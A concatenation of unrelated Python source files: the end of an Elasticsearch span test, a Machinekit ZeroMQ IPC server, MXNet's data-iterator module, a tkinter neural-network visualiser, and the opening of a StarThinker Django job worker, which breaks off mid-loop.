self.assertEqual(span.name, helpers.dsl_index_span_name)
attributes = {
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": helpers.dsl_index_url,
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span, attributes)
self.assertEqual(
literal_eval(span.attributes["db.statement"]),
{
"body": "A few words here, a few words there",
"title": "About searching",
},
)
|
ipc-server.py
|
#!/usr/bin/env python
import sys
import os
import time
import threading
import zmq
# Machinekit specific, can only use on local machine
from machinekit import config
# Machinetalk bindings
from pymachinetalk.dns_sd import ServiceDiscovery, ServiceDiscoveryFilter
from pymachinetalk.application import ApplicationStatus
from pymachinetalk.application import ApplicationCommand
import pymachinetalk.application as application
from ipcmsg_pb2 import *
if sys.version_info >= (3, 0):
import configparser
else:
import ConfigParser as configparser
class IPCServer:
def __init__(self, uuid, debug=True):
self.debug = debug
self.threads = []
self.shutdown = threading.Event()
sd_filter = ServiceDiscoveryFilter(txt_records={'uuid': uuid})
self.sd = ServiceDiscovery(filter_=sd_filter)
self.status = ApplicationStatus()
self.command = ApplicationCommand()
self.sd.register(self.status)
self.sd.register(self.command)
# create ipc sockets
context = zmq.Context()
context.linger = 0
self.context = context
# self.pubSocket = context.socket(zmq.PUB)
# self.pubSocket.bind('ipc://machinetalk-server.ipc')
# self.pubDsname = self.pubSocket.get_string(zmq.LAST_ENDPOINT, encoding='utf-8')
# if self.debug:
# print('bound PUB socket to %s' % self.pubDsname)
self.zmqSocket = context.socket(zmq.ROUTER)
self.zmqSocket.bind('ipc://machinetalk-server.ipc')
self.zmqDsname = self.zmqSocket.get_string(zmq.LAST_ENDPOINT, encoding='utf-8')
if self.debug:
print('bound ROUTER socket to %s' % self.zmqDsname)
self.zmqLock = threading.Lock()
self._tx = Message()
self._rx = Message()
self.threads.append(threading.Thread(target=self.socket_worker))
for thread in self.threads:
thread.start()
def send_msg(self, identity, msg_type):
with self.zmqLock:
self._tx.type = msg_type
txBuffer = self._tx.SerializeToString()
self.zmqSocket.send_multipart([identity, txBuffer], zmq.NOBLOCK)
self._tx.Clear()
def socket_worker(self):
poll = zmq.Poller()
poll.register(self.zmqSocket, zmq.POLLIN)
while not self.shutdown.is_set():
s = dict(poll.poll(200))
if self.zmqSocket in s and s[self.zmqSocket] == zmq.POLLIN:
self.process_msg(self.zmqSocket)
def process_msg(self, socket):
(identity, message) = socket.recv_multipart()
self._rx.ParseFromString(message)
if self.debug:
print("process message called, id: %s" % identity)
print(str(self._rx))
if self._rx.type == IPC_POSITION:
self._tx.x = (
self.status.motion.position.x
- self.status.motion.g5x_offset.x
- self.status.motion.g92_offset.x
- self.status.io.tool_offset.x
)
self._tx.y = (
self.status.motion.position.y
- self.status.motion.g5x_offset.y
- self.status.motion.g92_offset.y
- self.status.io.tool_offset.y
)
self.send_msg(identity, IPC_POSITION)
elif self._rx.type == IPC_JOG:
self.command.set_task_mode(application.EMC_TASK_MODE_MANUAL)
self.command.jog(
self._rx.jog_type, self._rx.axis, self._rx.velocity, self._rx.distance
)
elif self._rx.type == IPC_CONNECTED:
self._tx.connected = self.status.synced and self.command.connected
self.send_msg(identity, IPC_CONNECTED)
def start(self):
self.sd.start()
def stop(self):
self.sd.stop()
self.shutdown.set()
for thread in self.threads:
thread.join()
self.threads = []
def main():
mkconfig = config.Config()
mkini = os.getenv("MACHINEKIT_INI")
if mkini is None:
mkini = mkconfig.MACHINEKIT_INI
if not os.path.isfile(mkini):
sys.stderr.write("MACHINEKIT_INI " + mkini + " does not exist\n")
sys.exit(1)
mki = configparser.ConfigParser()
mki.read(mkini)
uuid = mki.get("MACHINEKIT", "MKUUID")
# remote = mki.getint("MACHINEKIT", "REMOTE")
ipcServer = IPCServer(uuid=uuid)
ipcServer.start()
try:
while True:
time.sleep(0.5)
except KeyboardInterrupt:
pass
print("stopping threads")
ipcServer.stop()
# wait for all threads to terminate
while threading.active_count() > 1:
time.sleep(0.1)
print("threads stopped")
sys.exit(0)
if __name__ == "__main__":
main()
|
io.py
|
# coding: utf-8
# pylint: disable=invalid-name, protected-access, fixme, too-many-arguments, W0221, W0201, no-self-use, no-member
"""NDArray interface of mxnet"""
from __future__ import absolute_import
from collections import OrderedDict, namedtuple
import sys
import ctypes
import logging
import threading
import numpy as np
from .base import _LIB
from .base import c_array, c_str, mx_uint, py_str
from .base import DataIterHandle, NDArrayHandle
from .base import mx_real_t
from .base import check_call, build_param_doc as _build_param_doc
from .ndarray import NDArray
from .ndarray import array
from .ndarray import concatenate
# pylint: disable=W0622
class DataDesc(namedtuple('DataDesc', ['name', 'shape'])):
"""Named data desc description contains name, shape, type and other extended attributes.
"""
def __new__(cls, name, shape, dtype=mx_real_t, layout='NCHW'):
ret = super(cls, DataDesc).__new__(cls, name, shape)
ret.dtype = dtype
ret.layout = layout
return ret
def __repr__(self):
return "DataDesc[%s,%s,%s,%s]" % (self.name, self.shape, self.dtype,
self.layout)
@staticmethod
def get_batch_axis(layout):
"""Get the dimension that corresponds to the batch size.
Parameters
----------
layout : str
layout string. For example, "NCHW".
Returns
-------
An axis indicating the batch_size dimension. When data-parallelism is
used, the data will be automatically split and concatenate along the batch_size
dimension. Axis can be -1, which means the whole array will be copied for each
data-parallelism device.
"""
if layout is None:
return 0
return layout.find('N')
@staticmethod
def get_list(shapes, types):
"""Get DataDesc list from attribute lists.
Parameters
----------
shapes : shape tuple list with (name, shape) tuples
types : type tuple list with (name, type) tuples
"""
if types is not None:
type_dict = dict(types)
return [DataDesc(x[0], x[1], type_dict[x[0]]) for x in shapes]
else:
return [DataDesc(x[0], x[1]) for x in shapes]
class DataBatch(object):
"""Default object for holding a mini-batch of data and related information."""
def __init__(self, data, label, pad=None, index=None,
bucket_key=None, provide_data=None, provide_label=None):
self.data = data
self.label = label
self.pad = pad
self.index = index
# the following properties are only used when bucketing is used
self.bucket_key = bucket_key
self.provide_data = provide_data
self.provide_label = provide_label
class DataIter(object):
"""DataIter object in mxnet. """
def __init__(self):
self.batch_size = 0
def __iter__(self):
return self
def reset(self):
"""Reset the iterator. """
pass
def next(self):
"""Get next data batch from iterator. Equivalent to
self.iter_next()
DataBatch(self.getdata(), self.getlabel(), self.getpad(), None)
Returns
-------
data : DataBatch
The data of next batch.
"""
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=self.getindex())
else:
raise StopIteration
def __next__(self):
return self.next()
def iter_next(self):
"""Iterate to next batch.
Returns
-------
has_next : boolean
Whether the move is successful.
"""
pass
def getdata(self):
"""Get data of current batch.
Returns
-------
data : NDArray
The data of current batch.
"""
pass
def getlabel(self):
"""Get label of current batch.
Returns
-------
label : NDArray
The label of current batch.
"""
pass
def getindex(self):
"""Get index of the current batch.
Returns
-------
index : numpy.array
The index of current batch
"""
return None
def getpad(self):
"""Get the number of padding examples in current batch.
Returns
-------
pad : int
Number of padding examples in current batch
"""
pass
class ResizeIter(DataIter):
"""Resize a DataIter to given number of batches per epoch.
May produce incomplete batch in the middle of an epoch due
to padding from internal iterator.
Parameters
----------
data_iter : DataIter
Internal data iterator.
size : number of batches per epoch to resize to.
reset_internal : whether to reset internal iterator on ResizeIter.reset
"""
def __init__(self, data_iter, size, reset_internal=True):
super(ResizeIter, self).__init__()
self.data_iter = data_iter
self.size = size
self.reset_internal = reset_internal
self.cur = 0
self.current_batch = None
self.provide_data = data_iter.provide_data
self.provide_label = data_iter.provide_label
self.batch_size = data_iter.batch_size
def reset(self):
self.cur = 0
if self.reset_internal:
self.data_iter.reset()
def iter_next(self):
if self.cur == self.size:
return False
try:
self.current_batch = self.data_iter.next()
except StopIteration:
self.data_iter.reset()
self.current_batch = self.data_iter.next()
self.cur += 1
return True
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
class PrefetchingIter(DataIter):
"""Base class for prefetching iterators. Takes one or more DataIters (
or any class with "reset" and "next" methods) and combine them with
prefetching. For example:
Parameters
----------
iters : DataIter or list of DataIter
one or more DataIters (or any class with "reset" and "next" methods)
rename_data : None or list of dict
i-th element is a renaming map for i-th iter, in the form of
{'original_name' : 'new_name'}. Should have one entry for each entry
in iter[i].provide_data
rename_label : None or list of dict
Similar to rename_data
Examples
--------
iter = PrefetchingIter([NDArrayIter({'data': X1}), NDArrayIter({'data': X2})],
rename_data=[{'data': 'data1'}, {'data': 'data2'}])
"""
def __init__(self, iters, rename_data=None, rename_label=None):
super(PrefetchingIter, self).__init__()
if not isinstance(iters, list):
iters = [iters]
self.n_iter = len(iters)
assert self.n_iter > 0
self.iters = iters
self.rename_data = rename_data
self.rename_label = rename_label
self.batch_size = self.provide_data[0][1][0]
self.data_ready = [threading.Event() for i in range(self.n_iter)]
self.data_taken = [threading.Event() for i in range(self.n_iter)]
for e in self.data_taken:
e.set()
self.started = True
self.current_batch = [None for i in range(self.n_iter)]
self.next_batch = [None for i in range(self.n_iter)]
def prefetch_func(self, i):
"""Thread entry"""
while True:
self.data_taken[i].wait()
if not self.started:
break
try:
self.next_batch[i] = self.iters[i].next()
except StopIteration:
self.next_batch[i] = None
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) \
for i in range(self.n_iter)]
for thread in self.prefetch_threads:
thread.setDaemon(True)
thread.start()
def __del__(self):
self.started = False
for e in self.data_taken:
e.set()
for thread in self.prefetch_threads:
thread.join()
@property
def provide_data(self):
"""The name and shape of data provided by this iterator"""
if self.rename_data is None:
return sum([i.provide_data for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_data
] for r, i in zip(self.rename_data, self.iters)], [])
@property
def provide_label(self):
"""The name and shape of label provided by this iterator"""
if self.rename_label is None:
return sum([i.provide_label for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_label
] for r, i in zip(self.rename_label, self.iters)], [])
def reset(self):
for e in self.data_ready:
e.wait()
for i in self.iters:
i.reset()
for e in self.data_ready:
e.clear()
for e in self.data_taken:
e.set()
def iter_next(self):
for e in self.data_ready:
e.wait()
if self.next_batch[0] is None:
for i in self.next_batch:
assert i is None, "Number of entry mismatches between iterators"
return False
else:
for batch in self.next_batch:
assert batch.pad == self.next_batch[0].pad, \
"Number of entry mismatches between iterators"
self.current_batch = DataBatch(sum([batch.data for batch in self.next_batch], []),
sum([batch.label for batch in self.next_batch], []),
self.next_batch[0].pad,
self.next_batch[0].index,
provide_data=self.provide_data,
provide_label=self.provide_label)
for e in self.data_ready:
e.clear()
for e in self.data_taken:
e.set()
return True
def next(self):
if self.iter_next():
return self.current_batch
else:
raise StopIteration
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
def _init_data(data, allow_empty, default_name):
"""Convert data into canonical form."""
assert (data is not None) or allow_empty
if data is None:
data = []
if isinstance(data, (np.ndarray, NDArray)):
data = [data]
if isinstance(data, list):
if not allow_empty:
assert(len(data) > 0)
if len(data) == 1:
data = OrderedDict([(default_name, data[0])])
else:
data = OrderedDict([('_%d_%s' % (i, default_name), d) for i, d in enumerate(data)])
if not isinstance(data, dict):
raise TypeError("Input must be NDArray, numpy.ndarray, " + \
"a list of them or dict with them as values")
for k, v in data.items():
if not isinstance(v, NDArray):
try:
data[k] = array(v)
except:
raise TypeError(("Invalid type '%s' for %s, " % (type(v), k)) + \
"should be NDArray or numpy.ndarray")
return list(data.items())
class NDArrayIter(DataIter):
"""NDArrayIter object in mxnet. Taking NDArray or numpy array to get dataiter.
Parameters
----------
data: NDArray or numpy.ndarray, a list of them, or a dict of string to them.
NDArrayIter supports single or multiple data and label.
label: NDArray or numpy.ndarray, a list of them, or a dict of them.
Same as data, but is not fed to the model during testing.
batch_size: int
Batch Size
shuffle: bool
Whether to shuffle the data
last_batch_handle: 'pad', 'discard' or 'roll_over'
How to handle the last batch
Note
----
This iterator will pad, discard or roll over the last batch if
the size of data does not match batch_size. Roll over is intended
for training and can cause problems if used for prediction.
"""
def __init__(self, data, label=None, batch_size=1, shuffle=False,
last_batch_handle='pad', label_name='softmax_label'):
# pylint: disable=W0201
super(NDArrayIter, self).__init__()
self.data = _init_data(data, allow_empty=False, default_name='data')
self.label = _init_data(label, allow_empty=True, default_name=label_name)
# shuffle data
if shuffle:
idx = np.arange(self.data[0][1].shape[0])
np.random.shuffle(idx)
self.data = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.data]
self.label = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.label]
# batching
if last_batch_handle == 'discard':
new_n = self.data[0][1].shape[0] - self.data[0][1].shape[0] % batch_size
data_dict = OrderedDict(self.data)
label_dict = OrderedDict(self.label)
for k, _ in self.data:
data_dict[k] = data_dict[k][:new_n]
for k, _ in self.label:
label_dict[k] = label_dict[k][:new_n]
self.data = data_dict.items()
self.label = label_dict.items()
self.data_list = [x[1] for x in self.data] + [x[1] for x in self.label]
self.num_source = len(self.data_list)
self.num_data = self.data_list[0].shape[0]
assert self.num_data >= batch_size, \
"batch_size need to be smaller than data size."
self.cursor = -batch_size
self.batch_size = batch_size
self.last_batch_handle = last_batch_handle
@property
def provide_data(self):
"""The name and shape of data provided by this iterator"""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.data
]
@property
def provide_label(self):
"""The name and shape of label provided by this iterator"""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.label
]
def hard_reset(self):
"""Igore roll over data and set to start"""
self.cursor = -self.batch_size
def reset(self):
if self.last_batch_handle == 'roll_over' and self.cursor > self.num_data:
self.cursor = -self.batch_size + (self.cursor%self.num_data)%self.batch_size
else:
self.cursor = -self.batch_size
def iter_next(self):
self.cursor += self.batch_size
return self.cursor < self.num_data
def next(self):
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=None)
else:
raise StopIteration
def _getdata(self, data_source):
"""Load data from underlying arrays, internal use only"""
assert(self.cursor < self.num_data), "DataIter needs reset."
if self.cursor + self.batch_size <= self.num_data:
return [x[1][self.cursor:self.cursor+self.batch_size] for x in data_source]
else:
pad = self.batch_size - self.num_data + self.cursor
return [concatenate([x[1][self.cursor:], x[1][:pad]]) for x in data_source]
def getdata(self):
return self._getdata(self.data)
def getlabel(self):
return self._getdata(self.label)
def getpad(self):
if self.last_batch_handle == 'pad' and \
self.cursor + self.batch_size > self.num_data:
return self.cursor + self.batch_size - self.num_data
else:
return 0
class MXDataIter(DataIter):
"""DataIter built in MXNet. List all the needed functions here.
Parameters
----------
handle : DataIterHandle
the handle to the underlying C++ Data Iterator
"""
def __init__(self, handle, data_name='data', label_name='softmax_label', **_):
super(MXDataIter, self).__init__()
self.handle = handle
# debug option, used to test the speed with io effect eliminated
self._debug_skip_load = False
# load the first batch to get shape information
self.first_batch = None
self.first_batch = self.next()
data = self.first_batch.data[0]
label = self.first_batch.label[0]
# properties
self.provide_data = [DataDesc(data_name, data.shape, data.dtype)]
self.provide_label = [DataDesc(label_name, label.shape, label.dtype)]
self.batch_size = data.shape[0]
def __del__(self):
check_call(_LIB.MXDataIterFree(self.handle))
def debug_skip_load(self):
"""Set the iterator to simply return always first batch.
Notes
-----
This can be used to test the speed of network without taking
the loading delay into account.
"""
self._debug_skip_load = True
logging.info('Set debug_skip_load to be true, will simply return first batch')
def reset(self):
self._debug_at_begin = True
self.first_batch = None
check_call(_LIB.MXDataIterBeforeFirst(self.handle))
def next(self):
if self._debug_skip_load and not self._debug_at_begin:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
if self.first_batch is not None:
batch = self.first_batch
self.first_batch = None
return batch
self._debug_at_begin = False
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
if next_res.value:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
else:
raise StopIteration
def iter_next(self):
if self.first_batch is not None:
return True
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
return next_res.value
def getdata(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetData(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getlabel(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetLabel(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getindex(self):
index_size = ctypes.c_uint64(0)
index_data = ctypes.POINTER(ctypes.c_uint64)()
check_call(_LIB.MXDataIterGetIndex(self.handle,
ctypes.byref(index_data),
ctypes.byref(index_size)))
address = ctypes.addressof(index_data.contents)
dbuffer = (ctypes.c_uint64* index_size.value).from_address(address)
np_index = np.frombuffer(dbuffer, dtype=np.uint64)
return np_index.copy()
def getpad(self):
pad = ctypes.c_int(0)
check_call(_LIB.MXDataIterGetPadNum(self.handle, ctypes.byref(pad)))
return pad.value
def _make_io_iterator(handle):
"""Create an io iterator by handle."""
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
check_call(_LIB.MXDataIterGetIterInfo( \
handle, ctypes.byref(name), ctypes.byref(desc), \
ctypes.byref(num_args), \
ctypes.byref(arg_names), \
ctypes.byref(arg_types), \
ctypes.byref(arg_descs)))
iter_name = py_str(name.value)
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
doc_str = ('%s\n\n' +
'%s\n' +
'name : string, required.\n' +
' Name of the resulting data iterator.\n\n' +
'Returns\n' +
'-------\n' +
'iterator: DataIter\n'+
' The result iterator.')
doc_str = doc_str % (desc.value, param_str)
def creator(*args, **kwargs):
"""Create an iterator.
The parameters listed below can be passed in as keyword arguments.
Parameters
----------
name : string, required.
Name of the resulting data iterator.
Returns
-------
dataiter: Dataiter
the resulting data iterator
"""
param_keys = []
param_vals = []
for k, val in kwargs.items():
param_keys.append(c_str(k))
param_vals.append(c_str(str(val)))
# create atomic symbol
param_keys = c_array(ctypes.c_char_p, param_keys)
param_vals = c_array(ctypes.c_char_p, param_vals)
iter_handle = DataIterHandle()
check_call(_LIB.MXDataIterCreateIter(
handle,
mx_uint(len(param_keys)),
param_keys, param_vals,
ctypes.byref(iter_handle)))
if len(args):
raise TypeError('%s can only accept keyword arguments' % iter_name)
return MXDataIter(iter_handle, **kwargs)
creator.__name__ = iter_name
creator.__doc__ = doc_str
return creator
def _init_io_module():
"""List and add all the data iterators to current module."""
plist = ctypes.POINTER(ctypes.c_void_p)()
size = ctypes.c_uint()
check_call(_LIB.MXListDataIters(ctypes.byref(size), ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = ctypes.c_void_p(plist[i])
dataiter = _make_io_iterator(hdl)
setattr(module_obj, dataiter.__name__, dataiter)
# Initialize the io in startups
_init_io_module()
|
App.py
|
import tkinter as tk
import numpy as np
import tkinter.filedialog
import threading
import MLPV3
class App():
def __init__(self):
self.args = []
self.running = False
# Create the root window.
self.root = tk.Tk()
self.root.title("Neural Net Visualization")
self.root.geometry("%dx%d+0+0" % (self.root.winfo_screenwidth(), self.root.winfo_screenheight()))
# Create the frame for the canvas.
netFrame = tk.Frame(self.root, highlightbackground = "black", highlightcolor = "black", highlightthickness=1)
netFrame.pack(side = tk.RIGHT, fill = tk.BOTH, expand = 1)
# Create the canvas for the net representation.
self.canvas = tk.Canvas(netFrame)
self.canvas.configure(background='pink')
self.canvas.pack(fill = tk.BOTH, expand = 1)
# Create the frame for the settings.
settingsFrame = tk.Frame(self.root)
settingsFrame.pack(side = tk.LEFT, fill = tk.Y)
# Create a slider to select learning rate.
self.lrSlider = tk.Scale(settingsFrame, label = "Learning Rate", from_ = 0.001, to = 1, orient = tk.HORIZONTAL, resolution = 0.001, command = self.setLearningRate)
self.lrSlider.grid(row = 0, column = 0, sticky = tk.W)
# Create an entry box for custom learning rate.
self.lrInput = tk.Entry(settingsFrame)
self.lrInput.grid(row = 1, column = 0, sticky = tk.W, pady = 10)
# Create a slider to select number of epochs.
self.epochSlider = tk.Scale(settingsFrame, label = "Training Epochs", from_ = 1000, to = 1000000, orient = tk.HORIZONTAL, length = 200, resolution = 1000, command = self.setEpochs)
self.epochSlider.grid(row = 2, column = 0, sticky = tk.W)
# Create an entry box for a custom epochs.
self.epochInput = tk.Entry(settingsFrame)
self.epochInput.grid(row = 3, column = 0, sticky = tk.W, pady = 10)
# Create an slider to select the error to stop at.
self.errorSlider = tk.Scale(settingsFrame, label = "Desired Error", from_ = 0, to = .3, orient = tk.HORIZONTAL, length = 200, resolution = 0.01, command = self.setError)
self.errorSlider.grid(row = 4, column = 0, sticky = tk.W)
# Create an entry box for a custom error.
self.errorInput = tk.Entry(settingsFrame)
self.errorInput.grid(row = 5, column = 0, sticky = tk.W, pady = 10)
# Create a dropdown menu to select activation function.
self.activationFunction = tk.StringVar(self.root)
self.activationFunction.set("Tanh")
self.activationMenu = tk.OptionMenu(settingsFrame, self.activationFunction, "Tanh", "Sigmoid", "ReLU", "LReLU")
self.activationMenu.grid(row = 6, column = 0, sticky = tk.W)
# Create a drowdown menu to select training type.
self.learningType = tk.StringVar(self.root)
self.learningType.set("Batch")
self.trainingMenu = tk.OptionMenu(settingsFrame, self.learningType, "Batch", "Stochastic", "Mini Batches")
self.trainingMenu.grid(row = 7, column = 0, sticky = tk.W)
self.batchSlider = tk.Scale(settingsFrame, label = "Mini Batch Size", from_ = 10, to = 1000, orient = tk.HORIZONTAL, length = 200, resolution = 10, command = self.setBatch)
self.batchSlider.grid(row = 8, column = 0, sticky = tk.W)
self.batchInput = tk.Entry(settingsFrame)
self.batchInput.grid(row = 9, column = 0, sticky = tk.W)
# Create a table and entry to input neural net shape
tk.Label(settingsFrame, text = "Neural Net Shape").grid(row = 10, column = 0, sticky = tk.W);
self.shapeInput = tk.Entry(settingsFrame)
self.shapeInput.grid(row = 11, column = 0, sticky = tk.W)
# Create a button that allows you to select a file for training data.
self.selectFileBtn = tk.Button(settingsFrame, text = "Select Training Data", command = self.selectTrainingData)
self.selectFileBtn.grid(row = 12, column = 0, sticky = tk.W, pady = 10)
self.dataFile = tk.StringVar(self.root)
self.dataFile.set("No Data File Selected");
self.selectedData = tk.Label(settingsFrame, textvariable = self.dataFile, wraplength = 200, anchor = tk.W, justify = tk.LEFT)
self.selectedData.grid(row = 13, column = 0, sticky = tk.W);
# Create a button to initialize network
self.initBtn = tk.Button(settingsFrame, text = "Initialize", command = self.initNet)
self.initBtn.grid(row = 14, column = 0, sticky = tk.W)
# Create a button to edit the nerual net parameters
self.editBtn = tk.Button(settingsFrame, text = "Re-initialize Parameters", command = self.editNet)
self.editBtn.grid(row = 15, column = 0, sticky = tk.W)
# Create a button to start network training.
self.runBtn = tk.Button(settingsFrame, text = "Train", command = self.startNet)
self.runBtn.grid(row = 16, column = 0, sticky = tk.W)
# Create a button to stop network training.
self.stopBtn = tk.Button(settingsFrame, text = "Stop", command = self.stopNet)
self.stopBtn.grid(row = 17, column = 0, sticky = tk.W)
self.graphBtn = tk.Button(settingsFrame, text = "Generate Graph", command = self.generateGraph)
self.graphBtn.grid(row = 18, column = 0, sticky = tk.W)
# Create a label telling the status of the net.
self.status = tk.StringVar(self.root)
self.status.set("Running: " + str(self.running));
self.currentStatus = tk.Label(settingsFrame, textvariable = self.status, wraplength = 200, anchor = tk.W, justify = tk.LEFT)
self.currentStatus.grid(row = 19, column = 0, sticky = tk.W)
self.infoText = []
self.net = MLPV.Net()
def setLearningRate(self, lr):
self.lrInput.delete(0, tk.END)
self.lrInput.insert(0, lr)
def setEpochs(self, epochs):
self.epochInput.delete(0, tk.END)
self.epochInput.insert(0, epochs)
def setError(self, error):
self.errorInput.delete(0, tk.END)
self.errorInput.insert(0, error)
def setBatch(self, batchSize):
self.batchInput.delete(0, tk.END)
self.batchInput.insert(0, batchSize)
def generateGraph(self):
self.net.generateGraph(self.trainingData)
def selectTrainingData(self):
self.trainingData = tkinter.filedialog.askopenfilename(initialdir = "/", title = "Select a file", filetypes = (("text files", "*.txt"),))
self.dataFile.set(self.trainingData)
def setInputs(self):
self.lr = self.lrInput.get()
self.epochs = self.epochInput.get()
self.error = self.errorInput.get()
self.shape = self.shapeInput.get()
self.batchSize = self.batchInput.get()
def startNet(self):
self.net.setInit(True)
self.net.startNet()
t1 = threading.Thread(target = self.net.train)
t1.daemon = True
t1.start()
self.running = True
def stopNet(self):
self.running = False
self.net.stopNet()
def initNet(self):
self.setInputs()
if any(c.isalpha() for c in self.lr) or any(c.isalpha() for c in self.epochs) or any(c.isalpha() for c in self.error) or any(c.isalpha() for c in self.shape):
print("Should not cointain alpha characters.")
else :
self.net.initNeuralNet(self.lr, self.epochs, self.error, self.activationFunction.get(), self.learningType.get(), self.trainingData, self.shape, self.batchSize)
self.drawNet()
def editNet(self):
self.lr = self.lrInput.get()
self.epochs = self.epochInput.get()
self.error = self.errorInput.get()
self.net.editNet(self.lr, self.epochs, self.error)
def drawNet(self):
self.canvas.delete("all");
shape = self.net.getShape()
layerDist = float(self.canvas.winfo_width()) / float(((len(shape)) + 1))
layers = []
nodeSize = 1
weightSize = 1
for layer in range(len(shape)):
prevNodes = []
layerPos = (layer + 1) * layerDist
nodeDist = float(self.canvas.winfo_height() - 40) / float((shape[layer] + 1))
nodes = []
for node in range(shape[layer]):
nodePos = ((node + 1) * nodeDist) + 20
nodes.append(nodePos)
self.canvas.create_oval(layerPos - nodeSize, nodePos - nodeSize, layerPos + nodeSize, nodePos + nodeSize, fill="black")
if layer > 0:
for prevNode in range(shape[layer - 1]):
line = self.canvas.create_line(layer * layerDist, layers[layer - 1][prevNode], layerPos, nodePos, fill = "blue", width = weightSize)
self.canvas.tag_lower(line)
layers.append(nodes)
self.drawInfo()
def drawInfo(self):
for index in range(0, len(self.infoText)):
self.canvas.delete(self.infoText[index])
self.infoText = []
self.infoText.append(self.canvas.create_text(self.canvas.winfo_width() - 80, 50, fill = "black", text = "Loss: \n" + str(self.net.getLoss())[0:7]))
self.infoText.append(self.canvas.create_text(self.canvas.winfo_width() - 80, 80, fill = "black", text = "Error: \n" + str(self.net.getError())[0:7]))
self.infoText.append(self.canvas.create_text(50, 50, fill = "black", text = "Epochs: \n" + str(self.net.getEpochs())))
def update(self):
if self.net.isRunning() == False:
self.running = False
self.status.set("Running: " + str(self.running));
if self.net.isRunning():
self.drawInfo()
def run(self):
while(True):
self.update()
self.root.update_idletasks()
self.root.update()
app = App()
app.run()
|
job_worker.py
|
###########################################################################
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import os
import fcntl
import json
import math
import uuid
import time
import signal
import traceback
import subprocess
import threading
from datetime import datetime
from django.core.management.base import BaseCommand, CommandError
from django.db import connection, transaction
from django.conf import settings
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, utc_milliseconds_to_timezone, JOB_LOOKBACK_MS, JOB_INTERVAL_MS
from starthinker_ui.recipe.log import log_manager_start, log_manager_end, log_manager_scale, log_manager_timeout, log_manager_error
from starthinker_ui.recipe.log import log_job_timeout, log_job_error, log_job_start, log_job_end, log_job_cancel
from starthinker_ui.recipe.log import log_verbose, get_instance_name
from starthinker_ui.recipe.compute import group_instances_delete
MANAGER_ON = True
MANAGER_HEALTHY = True
IDLE_INTERVAL = 5 * 60 # if worker is idle for 5 minutes, shut it down
def signal_exit(self, signum):
global MANAGER_ON
MANAGER_ON = False
signal.signal(signal.SIGINT, signal_exit)
signal.signal(signal.SIGTERM, signal_exit)
def worker_ping(worker_uid, recipe_uids):
# update recipes that belong to this worker
if recipe_uids:
Recipe.objects.filter(worker_uid=worker_uid, id__in=recipe_uids).update(worker_utm=utc_milliseconds())
def worker_status(worker_uid, recipe_uid, script, instance, hour, event, stdout, stderr):
try:
job = Recipe.objects.get(worker_uid=worker_uid, id=recipe_uid)
job.set_task(script, instance, hour, event, stdout, stderr)
except Recipe.DoesNotExist:
print('Expired Worker Job:', worker_uid, recipe_uid, script, instance, hour, event)
def worker_pull(worker_uid, jobs=1):
'''Atomic reservation of worker in jobs.
Args:
- worker_uid ( string ) - identifies a unique worker, must be same for every call from same worker.
- jobs ( integer ) - number of jobs to pull
'''
jobs_all = []
jobs_new = []
worker_utm = utc_milliseconds()
worker_lookback = worker_utm - JOB_LOOKBACK_MS
if jobs:
with transaction.atomic():
# find recipes that are available but have not been pinged recently from all workers ( pulls from pool )
where = Recipe.objects.filter(
active=True,
worker_utm__lte=worker_lookback,
job_utm__lte=worker_utm,
).exclude(job_utm=0).select_for_update(skip_locked=True).order_by('worker_utm').values_list('id', flat=True)[:jobs]
# mark those recipes as belonging to this worker
Recipe.objects.filter(id__in=where).update(worker_uid=worker_uid, worker_utm=worker_utm)
# find all recipes that belong to this worker and check if they have new tasks
for job in Recipe.objects.filter(active=True, worker_uid=worker_uid):
